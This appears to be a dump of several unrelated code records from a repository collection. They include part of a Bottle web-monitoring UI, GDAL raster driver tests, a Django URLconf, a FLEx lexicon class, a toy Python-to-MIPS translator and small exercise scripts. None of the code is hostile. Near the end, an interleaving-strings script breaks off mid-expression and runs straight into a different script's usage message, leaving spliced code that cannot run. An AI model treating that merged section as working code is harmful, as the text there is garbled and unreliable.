if widget_type == 'widget':\n found_widget = None\n for widget in webui.get_widgets_for('external'):\n if identifier == widget['id']:\n found_widget = widget\n break\n else:\n logger.warning(\"External application requested unknown widget: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Unknown required widget: %s.</h3>'\n '<p>The required widget is not available.</p>' % identifier\n )\n logger.debug(\"found widget: %s\", found_widget)\n\n embedded_element = found_widget['function'](\n embedded=True,\n identifier=identifier, credentials=credentials\n )\n\n if request.params.get('page', 'no') == 'no':\n return embedded_element\n\n return template('external_widget', {\n 'embedded_element': embedded_element\n })\n\n
if widget_type == 'table':\n found_table = None\n for table in webui.get_tables_for('external'):\n if identifier == table['id']:\n found_table = table\n break\n else:\n logger.warning(\"External application requested unknown table: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Unknown required table: %s.</h3>'\n '<p>The required table is not available.</p>' % identifier\n )\n logger.info(\"Found table: %s\", found_table)\n\n if action and action in found_table['actions']:\n logger.info(\"Required action: %s = %s\", action, found_table['actions'][action])\n return found_table['actions'][action]()\n\n if request.params.get('page', 'no') == 'no':\n return found_table['function'](\n embedded=True, identifier=identifier, credentials=credentials\n )\n\n return template('external_table', {\n 'embedded_element': found_table['function'](\n embedded=True, identifier=identifier, credentials=credentials\n )\n })\n\n
if widget_type == 'list':\n if identifier in webui.lists:\n return webui.lists[identifier]['function'](embedded=True)\n\n logger.warning(\"External application requested unknown list: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Unknown required list: %s.</h3>'\n '<p>The required list is not available.</p>' % identifier\n )\n\n
if widget_type in ['host', 'service', 'user']:\n if not action:\n logger.warning(\n \"External application requested %s widget without widget name\", widget_type\n )\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Missing %s widget name.</h3>'\n '<p>You must provide a widget name.</p>' % widget_type\n )\n\n # Identifier is the element identifier, not the widget one!\n found_widget = None\n for widget in webui.get_widgets_for(widget_type):\n if action == widget['id']:\n found_widget = widget\n break\n else:\n logger.warning(\"External application requested unknown widget: %s\", action)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Unknown required widget: %s.</h3>'\n '<p>The required widget is not available.</p>
    ' % action\n )\n logger.debug(\"Found %s widget: %s\", widget_type, found_widget)\n\n if request.params.get('page', 'no') == 'no':\n return found_widget['function'](\n element_id=identifier, widget_id=found_widget['id'],\n embedded=True, identifier=identifier, credentials=credentials\n )\n\n return template('external_widget', {\n 'embedded_element': found_widget['function'](\n element_id=identifier, widget_id=found_widget['id'],\n embedded=True, identifier=identifier, credentials=credentials\n )\n })\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI user's preferences\n# --------------------------------------------------------------------------------------------------\n@app.route('/preference/user', 'GET')\ndef get_user_preference():\n \"\"\"Get user's preferences for the current logged-in user\n\n Request parameters:\n\n - key, string identifying the parameter\n - default, default value if parameter does not exist\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.query.get('key', None)\n if not _key:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n default = request.query.get('default', None)\n if default:\n try:\n default = json.loads(default)\n except Exception:\n pass\n\n key_value = datamgr.get_user_preferences(user, _key, default)\n if key_value is None:\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko',\n 'message': 'Unknown key: %s' % _key})\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps(key_value)\n\n\n@app.route('/preference/user/delete', 'GET')\ndef delete_user_preference():\n \"\"\"Delete current logged-in user's preference\n\n Request parameters:\n\n - key, string identifying the parameter\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.query.get('key', None)\n if not _key:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps(datamgr.delete_user_preferences(user, _key))\n\n\n@app.route('/preference/user', 'POST')\ndef set_user_preference():\n \"\"\"Update current logged-in user's preference\n Request parameters:\n\n - key, string identifying the parameter\n - value, as a JSON formatted string\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.forms.get('key', None)\n _value = request.forms.get('value', None)\n if _key is None or _value is None:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n try:\n _value = json.loads(_value)\n except Exception:\n pass\n\n if datamgr.set_user_preferences(user, _key, _value):\n return WebUI.response_ok(message=_('User preferences saved'))\n\n return WebUI.response_ko(message=_('Problem encountered while saving user preferences'))\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI edition mode\n# --------------------------------------------------------------------------------------------------\n@app.route('/edition_mode', 'POST')\n# User preferences page ...\ndef edition_mode():\n \"\"\"Set edition mode on / off\n\n The `state` parameter is 'on' or 'off' to enable / disable the edition mode in the session\n\n If this parameter is not 
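# Illustrative sketch (not part of the original application): the preference
# routes above store one JSON value per (user, key). A hypothetical round
# trip with the requests library (not a dependency of this module):
import json
import requests

BASE = 'http://127.0.0.1:5001'        # assumed listening address

def save_pref(cookies, key, value):
    # POST form fields 'key' and 'value'; 'value' is JSON-encoded
    return requests.post(BASE + '/preference/user', cookies=cookies,
                         data={'key': key, 'value': json.dumps(value)})

def load_pref(cookies, key, default=None):
    # GET with 'key' and an optional JSON-encoded 'default'
    r = requests.get(BASE + '/preference/user', cookies=cookies,
                     params={'key': key, 'default': json.dumps(default)})
    return r.json()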
present, this function do not change the current edition mode that\n is simply returned in the response.\n\n Returns a JSON response:\n {'edition_mode': False, 'message': 'Edition mode disabled'}\n \"\"\"\n # Session...\n session = request.environ['beaker.session']\n user = session['current_user']\n if not user.can_edit_configuration():\n logger.warning(\"Current user '%s' is not authorized to change edition_mode\",\n user.get_username())\n response.status = 401\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko', 'message': 'Not authorized to change edition mode'})\n\n required_state = request.params.get('state', None)\n logger.debug(\"edition_mode, required state: %s\", required_state)\n\n if required_state is not None:\n # Make session edition mode available in the session and in the templates\n session['edition_mode'] = (required_state == 'on')\n BaseTemplate.defaults['edition_mode'] = session['edition_mode']\n logger.debug(\"edition_mode, session: %s\", session['edition_mode'])\n\n if session['edition_mode']:\n user_message = _('Edition mode enabled')\n else:\n user_message = _('Edition mode disabled')\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'edition_mode': session['edition_mode'], 'message': user_message})\n\n\n# Bottle templates path\nTEMPLATE_PATH.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'views'))\n\n# Make Bottle raise the inner exceptions when WebUI is in test mode\n# This makes it easier to debug\nif os.environ.get('ALIGNAK_WEBUI_TEST', False):\n app.catchall = False\n\n# -----\n# Extend default WSGI application with a session middleware\n# -----\nsession_type = app.config.get('session.type', 'file')\nif os.environ.get('ALIGNAK_WEBUI_SESSION_TYPE'):\n session_type = os.environ.get('ALIGNAK_WEBUI_SESSION_TYPE')\n print(\"Session type from environment: %s\" % session_type)\n\nsession_data = app.config.get('session.session_data',\n os.path.join('/tmp/alignak-webui/sessions'))\nif os.environ.get('ALIGNAK_WEBUI_SESSION_DATA'):\n session_data = os.environ.get('ALIGNAK_WEBUI_SESSION_DATA')\n print(\"Session data from environment: %s\" % session_data)\n\nsession_opts = {\n 'session.type': session_type,\n 'session.data_dir': session_data,\n 'session.auto': app.config.get('session.auto', True),\n 'session.cookie_expires': app.config.get('session.cookie_expires', True),\n 'session.key': app.config.get('session.key', __manifest__['name']),\n 'session.save_accessed_time': True,\n 'session.timeout': app.config.get('session.timeout', None),\n 'session.data_serializer': app.config.get('session.data_serializer', 'pickle'),\n # Do not remove! 
For unit tests only...\n 'session.webtest_varname': __manifest__['name'],\n}\nlogger.debug(\"Session parameters: %s\", session_opts)\nsession_app = SessionMiddleware(app, session_opts)\n\n\ndef main(): # pragma: no cover, because of test mode\n \"\"\"Function called by the setup.py console script\"\"\"\n logger.info(\"Running Bottle, debug mode: %s\", app.config.get('debug', False))\n\n run(\n app=session_app,\n # server='cherrypy',\n host=app.config.get('host', '127.0.0.1'),\n port=int(app.config.get('port', 5001)),\n debug=app.config.get('debug', False),\n reloader=app.config.get('debug', False)\n )\n # remember to remove reloader=True and debug(True) when you move your application\n # from development to a production environment\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alignak-monitoring-contrib/alignak-webui","sub_path":"alignak_webui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":42677,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"38140251357","text":"import os\nimport shutil\n\nimport gdaltest\nimport pytest\n\nfrom osgeo import gdal\n\npytestmark = pytest.mark.require_driver(\"AIG\")\n\n###############################################################################\n# Read test of simple byte reference data.\n\n\ndef test_aigrid_1():\n\n tst = gdaltest.GDALTest(\"AIG\", \"aigrid/abc3x1\", 1, 3)\n tst.testOpen()\n\n\n###############################################################################\n# Verify some auxiliary data.\n\n\ndef test_aigrid_2():\n\n ds = gdal.Open(\"data/aigrid/abc3x1/prj.adf\")\n\n gt = ds.GetGeoTransform()\n\n assert (\n gt[0] == -0.5\n and gt[1] == 1.0\n and gt[2] == 0.0\n and gt[3] == 0.5\n and gt[4] == 0.0\n and gt[5] == -1.0\n ), \"Aigrid geotransform wrong.\"\n\n prj = ds.GetProjection()\n assert (\n prj.find(\n 'PROJCS[\"unnamed\",GEOGCS[\"GDA94\",DATUM[\"Geocentric_Datum_of_Australia_1994\"'\n )\n != -1\n ), (\"Projection does not match expected:\\n%s\" % prj)\n\n band1 = ds.GetRasterBand(1)\n assert band1.GetNoDataValue() == 255, \"Grid NODATA value wrong or missing.\"\n\n assert band1.DataType == gdal.GDT_Byte, \"Data type is not Byte!\"\n\n\n###############################################################################\n# Verify the colormap, and nodata setting for test file.\n\n\ndef test_aigrid_3():\n\n ds = gdal.Open(\"data/aigrid/abc3x1\")\n cm = ds.GetRasterBand(1).GetRasterColorTable()\n assert (\n cm.GetCount() == 256\n and cm.GetColorEntry(0) == (95, 113, 150, 255)\n and cm.GetColorEntry(1) == (95, 57, 29, 255)\n ), \"Wrong colormap entries\"\n\n cm = None\n\n assert ds.GetRasterBand(1).GetNoDataValue() == 255.0, \"Wrong nodata value.\"\n\n\n###############################################################################\n# Read test of simple byte reference data with data directory name in all uppercase\n\n\ndef test_aigrid_4():\n\n tst = gdaltest.GDALTest(\"AIG\", \"aigrid/ABC3X1UC\", 1, 3)\n tst.testOpen()\n\n\n###############################################################################\n# Verify the colormap, and nodata setting for test file with names of coverage directory and all files in it in all uppercase. 
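Editor's note on the alignak-webui record above: it ends by wrapping the Bottle app in Beaker's SessionMiddleware, which is hard to see through the JSON escaping. A minimal standalone sketch of the same pattern, assuming beaker and bottle are installed; the route, path and port here are illustrative, not taken from the project:

from beaker.middleware import SessionMiddleware
from bottle import Bottle, request, run

app = Bottle()

@app.route('/hit')
def hit():
    # Beaker exposes the session dict through the WSGI environ,
    # just as the record reads request.environ['beaker.session']
    session = request.environ['beaker.session']
    session['hits'] = session.get('hits', 0) + 1
    session.save()
    return {'hits': session['hits']}

session_opts = {
    'session.type': 'file',               # same option keys as in the record
    'session.data_dir': '/tmp/sessions',  # illustrative path
    'session.auto': True,
}
wrapped_app = SessionMiddleware(app, session_opts)

if __name__ == '__main__':
    run(app=wrapped_app, host='127.0.0.1', port=5001)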
Additionally also test for case where clr file resides in parent directory of coverage.\n\n\ndef test_aigrid_5():\n\n ds = gdal.Open(\"data/aigrid/ABC3X1UC\")\n cm = ds.GetRasterBand(1).GetRasterColorTable()\n assert (\n cm.GetCount() == 256\n and cm.GetColorEntry(0) == (95, 113, 150, 255)\n and cm.GetColorEntry(1) == (95, 57, 29, 255)\n ), \"Wrong colormap entries\"\n\n cm = None\n\n assert ds.GetRasterBand(1).GetNoDataValue() == 255.0, \"Wrong nodata value.\"\n\n\n###############################################################################\n# Verify dataset whose sta.adf is 24 bytes\n\n\ndef test_aigrid_6():\n\n ds = gdal.Open(\"data/aigrid/aigrid_sta_24bytes/teststa\")\n\n assert ds.GetRasterBand(1).GetMinimum() == 0.0, \"Wrong minimum\"\n\n assert ds.GetRasterBand(1).GetMaximum() == 2.0, \"Wrong maximum\"\n\n\n###############################################################################\n# Read twice a broken tile (https://github.com/OSGeo/gdal/issues/4316)\n\n\ndef test_aigrid_broken():\n\n if os.path.exists(\"tmp/broken_aigrid\"):\n shutil.rmtree(\"tmp/broken_aigrid\")\n\n shutil.copytree(\"data/aigrid/abc3x1\", \"tmp/broken_aigrid\")\n\n # Write a bad offset for a block\n f = gdal.VSIFOpenL(\"tmp/broken_aigrid/w001001x.adf\", \"rb+\")\n gdal.VSIFSeekL(f, 100, 0)\n gdal.VSIFWriteL(b\"\\xff\" * 4, 1, 4, f)\n gdal.VSIFCloseL(f)\n\n ds = gdal.Open(\"tmp/broken_aigrid\")\n with pytest.raises(Exception):\n ds.GetRasterBand(1).Checksum()\n with pytest.raises(Exception):\n ds.GetRasterBand(1).Checksum()\n ds = None\n\n shutil.rmtree(\"tmp/broken_aigrid\")\n\n\n###############################################################################\n# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem\n\n\ndef test_aigrid_online_1():\n\n list_files = [\n \"info/arc.dir\",\n \"info/arc0000.dat\",\n \"info/arc0000.nit\",\n \"info/arc0001.dat\",\n \"info/arc0001.nit\",\n \"info/arc0002.dat\",\n \"info/arc0002.nit\",\n \"info/arc0002r.001\",\n \"nzdem500/dblbnd.adf\",\n \"nzdem500/hdr.adf\",\n \"nzdem500/log\",\n \"nzdem500/sta.adf\",\n \"nzdem500/vat.adf\",\n \"nzdem500/w001001.adf\",\n \"nzdem500/w001001x.adf\",\n ]\n\n try:\n os.mkdir(\"tmp/cache/nzdem\")\n os.mkdir(\"tmp/cache/nzdem/info\")\n os.mkdir(\"tmp/cache/nzdem/nzdem500\")\n except OSError:\n pass\n\n for filename in list_files:\n gdaltest.download_or_skip(\n \"http://download.osgeo.org/gdal/data/aig/nzdem/\" + filename,\n \"nzdem/\" + filename,\n )\n\n tst = gdaltest.GDALTest(\n \"AIG\", \"tmp/cache/nzdem/nzdem500/hdr.adf\", 1, 45334, filename_absolute=1\n )\n tst.testOpen()\n\n ds = gdal.Open(\"tmp/cache/nzdem/nzdem500/hdr.adf\")\n\n try:\n rat = ds.GetRasterBand(1).GetDefaultRAT()\n except Exception:\n print(\"Skipping RAT checking... 
OG Python bindings have no RAT API\")\n        return\n\n    assert rat is not None, \"No RAT found\"\n\n    assert rat.GetRowCount() == 2642, \"Wrong row count in RAT\"\n\n    assert rat.GetColumnCount() == 2, \"Wrong column count in RAT\"\n\n    assert rat.GetNameOfCol(0) == \"VALUE\", \"Wrong name of col 0\"\n\n    assert rat.GetTypeOfCol(0) == gdal.GFT_Integer, \"Wrong type of col 0\"\n\n    assert rat.GetUsageOfCol(0) == gdal.GFU_MinMax, \"Wrong usage of col 0\"\n\n    assert rat.GetNameOfCol(1) == \"COUNT\", \"Wrong name of col 1\"\n\n    assert rat.GetTypeOfCol(1) == gdal.GFT_Integer, \"Wrong type of col 1\"\n\n    assert rat.GetUsageOfCol(1) == gdal.GFU_PixelCount, \"Wrong usage of col 1\"\n\n    assert rat.GetValueAsInt(2641, 0) == 3627, \"Wrong value in RAT\"\n\n    assert ds.GetRasterBand(1).GetMinimum() == 0.0, \"Wrong minimum\"\n\n    assert ds.GetRasterBand(1).GetMaximum() == 3627.0, \"Wrong maximum\"\n\n\n###############################################################################\n# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem\n\n\ndef test_aigrid_online_2():\n\n    gdaltest.download_or_skip(\n        \"http://download.osgeo.org/gdal/data/aig/ai_bug_6886.zip\", \"ai_bug_6886.zip\"\n    )\n\n    try:\n        os.stat(\"tmp/cache/ai_bug\")\n    except OSError:\n        try:\n            gdaltest.unzip(\"tmp/cache\", \"tmp/cache/ai_bug_6886\")\n            try:\n                os.stat(\"tmp/cache/ai_bug\")\n            except OSError:\n                pytest.skip()\n        except Exception:\n            pytest.skip()\n\n    tst = gdaltest.GDALTest(\n        \"AIG\", \"tmp/cache/ai_bug/ai_bug/hdr.adf\", 1, 16018, filename_absolute=1\n    )\n    tst.testOpen()\n\n\n###############################################################################\n","repo_name":"OSGeo/gdal","sub_path":"autotest/gdrivers/aigrid.py","file_name":"aigrid.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"42655906341","text":"# 7. Write a function which returns an array of seven random numbers in a range of 0-9. 
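For readers unfamiliar with the GDAL API the aigrid tests above exercise, a minimal sketch of opening a raster and reading the same properties those tests assert on; the path is the sample grid named in the record, and osgeo must be installed:

from osgeo import gdal

ds = gdal.Open("data/aigrid/abc3x1")  # sample dataset path from the record
band = ds.GetRasterBand(1)
print("geotransform:", ds.GetGeoTransform())  # origin and pixel size
print("nodata:", band.GetNoDataValue())
print("min/max:", band.GetMinimum(), band.GetMaximum())
print("checksum:", band.Checksum())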
All the numbers must be unique.\nimport random\n\ndef sevenRandom():\n mySet = set()\n while len(mySet) < 7:\n mySet.add(random.randint(0,9))\n return list(mySet)\n\nprint(sevenRandom())","repo_name":"Engenheiro-VictorGomes/30DaysOfPython","sub_path":"Day12/E7.py","file_name":"E7.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26890599254","text":"import re\r\n\r\n\r\n\r\ntext_segment = \".text\\n\"\r\ndata_segment = \".data\\n\"\r\n\r\n\r\n# declaring possible patterns,\r\npattern_start,pattern2,pattern_end = r\"^[a-zA-z0-9?]\", r\"^#\",r\"[a-zA-z0-9?]$\"\r\npattern_var = r\"^[a-zA-Z]+[0-9]?\"\r\npattern_component = r\"[a-zA-Z0-9?]+|[0-9]+\"\r\n\r\noperations = ['+','-','/','*','**','%','//']\r\n# operation_map = {\r\n# \"+\" : \"add\",\r\n# \"-\" : \"sub\",\r\n# \"*\" : \"mul\",\r\n# \"/\" : \"div\",\r\n# \"//\" : \"mflo\",\r\n# \"%\" : \"rem\"\r\n# } \r\nVAR_REG = [\"$t0\"] # initializing register and for the pupose of dynamic allocation\r\ncn = 0 # to count register\r\n\r\ndef sortPrecedence(Plist:list):\r\n diction = {'+':6,'-':5,'/':4,'*':1,'**':0,'%':3,'//':2}\r\n toSort = []\r\n Slist = []\r\n for i in Plist:\r\n toSort += [diction[i[0]]]\r\n toSort.sort()\r\n flipped_dict = {value: key for key, value in diction.items()}\r\n\r\n for j in toSort:\r\n for k in Plist :\r\n if k[0] == flipped_dict[j]:\r\n Slist += [k]\r\n \r\n return Slist\r\ndef adjustReg(cn):\r\n global VAR_REG\r\n cn += 1 \r\n VAR_REG += [f'$t{cn}']\r\n return VAR_REG\r\n\r\n\r\n\r\n\r\ndef doMath(code):\r\n global data_segment, text_segment, cn, VAR_REG, operations, pattern2,pattern_check, pattern_component, pattern_end, pattern_start, pattern_var\r\n input_lines = code.split(\"\\n\")\r\n \r\n \r\n for line in input_lines:\r\n line = line.strip()\r\n if re.search(pattern2,line):\r\n continue\r\n start_right = re.findall(pattern_start,line)\r\n end_right = re.findall(pattern_end,line)\r\n if start_right and end_right:\r\n assign = False\r\n Terminal = line\r\n if '=' in line:\r\n splitted = line.split('=')\r\n \r\n nonTerminal, Terminal = splitted[0], splitted[1]\r\n # we expect the nonTerminal to be variable and a valid expression, so let's check it out\r\n if not re.search(pattern_var,nonTerminal):\r\n return \"invalid expression\"\r\n data_segment += f\"{nonTerminal}: .word 0\\n\" # adding the variable into the data segment\r\n assign = True\r\n \r\n\r\n\r\n \r\n # Now we're left with the Terminal part, the expression to be evaluated\r\n #check it's validity and produce precedence map, we gonna do it a two-dimentional array \r\n precedence = []\r\n ct = 0\r\n for i in operations:\r\n if i in Terminal:\r\n pattern_check = rf'(\\w|\\d|\\s){i}(\\w|\\d|\\s)'\r\n check = re.search(pattern_check,Terminal)\r\n if check:\r\n ct += 1\r\n precedence += [[f'{i}',ct]]\r\n\r\n if not check or (i == '*' or i == '/'):\r\n pattern_check = rf'(\\w|\\d|\\s){i+i}(\\w|\\d|\\s)'\r\n check = re.search(pattern_check,Terminal)\r\n if not check:\r\n return \"Invalid syntax\"\r\n ct += 1\r\n precedence += [[f'{i}{i}',ct]] \r\n \r\n\r\n components = re.findall(pattern_component,Terminal)\r\n precedence = sortPrecedence(precedence)\r\n\r\n\r\n #at this point we got the components and the precedence array, therfore do a thing to change it into assembly program\r\n # sort the precedence\r\n\r\n for op in precedence:\r\n operand1, operand2 = components[op[1]-1], components[op[1]]\r\n ## polishing our register by loading the existing 
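A note on the Day12/E7.py record above: growing a set in a loop works, but random.sample draws seven distinct values in a single call and keeps the random draw order, whereas list(mySet) returns set iteration order. A sketch of the alternative:

import random

def seven_random():
    # sampling without replacement guarantees uniqueness
    return random.sample(range(10), 7)

print(seven_random())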
variables and the already occupied register\r\n valid = False\r\n if operand1 in data_segment or operand2 in data_segment:\r\n valid = True\r\n if operand1 in data_segment:\r\n text_segment += f\"lw $t{cn},{operand1}\\n\"\r\n components[op[1]-1] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand2 in data_segment:\r\n text_segment += f\"lw $t{cn},{operand2}\\n\"\r\n components[op[1]] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand1 in VAR_REG or operand2 in VAR_REG:\r\n valid = True\r\n elif str(operand1).isdigit() or str(operand2).isdigit():\r\n valid = True\r\n if operand1.isdigit:\r\n text_segment += f\"li $t{cn},{operand1}\\n\"\r\n components[op[1]-1] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand2.isdigit:\r\n text_segment += f\"li $t{cn},{operand2}\\n\"\r\n components[op[1]] = f'$t{cn}'\r\n adjustReg(cn)\r\n ## now we are with a list of components of registers \r\n if valid:\r\n for op in precedence: \r\n if op[0] == '**':\r\n text_segment += \"\" # to be applied using the looping struncture\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n elif op[0] == '*':\r\n text_segment += f\"mul {components[op[1]-1]}, {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n elif op[0] == '+':\r\n text_segment += f\"add {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '-':\r\n text_segment += f\"sub {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '//':\r\n text_segment += f\"div {components[op[1]-1]}, {components[op[1]]} \\n mflo {components[op[1]-1]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '/':\r\n text_segment += f\"div {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '%':\r\n text_segment += f\"rem {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n ## at this point all entries of the component has the same value the final value and the final register,\r\n res = components[0]\r\n\r\n if assign:\r\n data = data_segment.rstrip()\r\n data = data.split(\"\\n\")\r\n lastval = data[-1]\r\n var = lastval[:lastval.index(':')].rstrip()\r\n adjustReg(cn)\r\n\r\n text_segment += f\"la {VAR_REG[-1]}, {var} \\n sw {res},({VAR_REG[-1]})\\n\"\r\n text_segment += f\"li $v0,1 \\n move $a0,{res} \\n syscall\\n\"\r\n \r\n else:\r\n return \"Invalid Syntax\"\r\n\r\n return data_segment + text_segment\r\n \r\nprint(doMath(\"complex_math = 6 + 7\"))\r\n\r\ndef read_and_compile(file_path):\r\n with open(file_path, 'r') as file:\r\n code = file.read()\r\n mips_code = doMath(code)\r\n with open(\"output1.asm\", \"w\") as file:\r\n print(mips_code)\r\n\r\nfile_path = \"hello.py\"\r\nread_and_compile(file_path)","repo_name":"kalkidan-hub/The_Compiler","sub_path":"new_math2.py","file_name":"new_math2.py","file_ext":"py","file_size_in_byte":7813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"500327228","text":"\"\"\"Project_SMO_Inventory URL Configuration\n\nThe `urlpatterns` list routes 
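On the The_Compiler record above: its regex-driven operator scan is fragile (the character class [a-zA-z] also matches the punctuation between 'Z' and 'a', and '**' needs a special case). Python's own parser already produces the operator tree for such expressions; a sketch of inspecting it, requiring Python 3.9+ for the indent argument:

import ast

tree = ast.parse("complex_math = 6 + 7")  # the record's own test input
print(ast.dump(tree, indent=2))           # shows Assign -> BinOp(Add) over constants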
URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\n\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^system_admin/', include('SuperUser.urls')),\n url(r'^', include('Login.urls')),\n url(r'^requisitioner/', include('Requisitioner.urls')),\n url(r'^inventory_office/', include('Inventory_Office.urls')),\n url(r'^inventory_office_admin/', include('Inventory_Office_Admin.urls')),\n url(r'^inventory_office_acct_mgr/', include('Inventory_Office_Acct_Mgr.urls')),\n url(r'^inventory_office_inv_clerk/', include('Inventory_Office_Inventory_Clerk.urls')),\n url(r'^inventory_office_rec_off/', include('Inventory_Office_Receiving_Off.urls')),\n url(r'^inventory_office_sup_off/', include('Inventory_Office_Supply_Officer.urls')),\n url(r'^procurement_office/', include('Procurement_Office.urls')),\n url(r'^approving_officer/', include('Approving_Office.urls')),\n url(r'^approving_officer_representative/', include('Approving_Office_Secretary.urls')),\n url(r'^non_requisitioner/', include('NonRequisitioner.urls')),\n url(r'^accounting/', include('Accounting.urls')),\n\n \n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"kem1101231/Project_SMO_Inventory","sub_path":"Project_SMO_Inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1155379980","text":"import re\n\nfrom flexpy.FlexPyUtil import get_single_child\nfrom flexpy.LexEntry import LexEntry\nfrom flexpy.TagDict import TagDict\n\n\n\nclass Lexicon:\n \"\"\"Contains the information in the FLEx database's lexicon.\n\n :param lex_entry_els:\n :type lex_entry_els: list(xml.etree.ElementTree.Element)\n :param tag_dict:\n :type tag_dict: :class:`flexpy.TagDict.TagDict`\n \"\"\"\n def __init__(self, lex_entry_els, tag_dict):\n self.lex_entry_els = lex_entry_els\n self.tag_dict = tag_dict\n self.lex_entries = self.create_lex_entries()\n\n @staticmethod\n def from_project_dir_and_name(project_dir, project_name):\n tag_dict = TagDict.from_project_dir_and_name(project_dir, project_name)\n return Lexicon.from_tag_dict(tag_dict)\n\n @staticmethod\n def from_tag_dict(tag_dict):\n lex_entries = tag_dict[\"RtLexEntry\"]\n return Lexicon(lex_entries, tag_dict)\n\n def create_lex_entries(self):\n res = []\n for guid, rts_with_guid in self.lex_entry_els.items():\n for rt in rts_with_guid:\n lex_entry = LexEntry(rt, self.tag_dict)\n res.append(lex_entry)\n return res\n\n def search_glosses(self, regex):\n \"\"\"Searches the lexicon's glosses for a regex\n \"\"\"\n results = []\n\n for lex_entry in self.lex_entries:\n for gloss in lex_entry.glosses:\n matches = re.search(regex, gloss)\n if matches is not None:\n results.append(lex_entry)\n 
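The Project_SMO_Inventory URLconf record above uses the Django 1.x url()/include() style. On Django 2.0 and later the same routing table is usually written with django.urls.path(); a sketch of the equivalent for the first few routes, with app names taken from the record:

from django.contrib import admin
from django.urls import include, path

urlpatterns = [
    path('admin/', admin.site.urls),
    path('system_admin/', include('SuperUser.urls')),
    path('', include('Login.urls')),  # url(r'^', ...) becomes path('', ...)
    path('requisitioner/', include('Requisitioner.urls')),
]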
break # don't double-add it if multiple senses match\n return results\n\n","repo_name":"Kuhron/flexpy","sub_path":"flexpy/Lexicon.py","file_name":"Lexicon.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"74666512420","text":"'''\nPrint all interleavings of given two strings\nGiven two strings str1 and str2, write a function that prints all interleavings of the given two strings.\nYou may assume that all characters in both strings are different\nExample:\n\nInput: str1 = \"AB\", str2 = \"CD\"\nOutput:\n ABCD\n ACBD\n ACDB\n CABD\n CADB\n CDAB\n\nInput: str1 = \"AB\", str2 = \"C\"\nOutput:\n ABC\n ACB\n CAB\n'''\n\nimport collections\n\ndef Validate(tmp,str1,str2):\n\n index_lst=[]\n for i in range(0,len(str1)):\n key=str1[i]\n idx=tmp.index(key)\n if len(index_lst)==0:\n index_lst.append(idx)\n else:\n if index_lst[-1]\")\n sys.exit(1)\n\nparms = {}\n\ndef mavparms(logfile):\n '''extract mavlink parameters'''\n mlog = 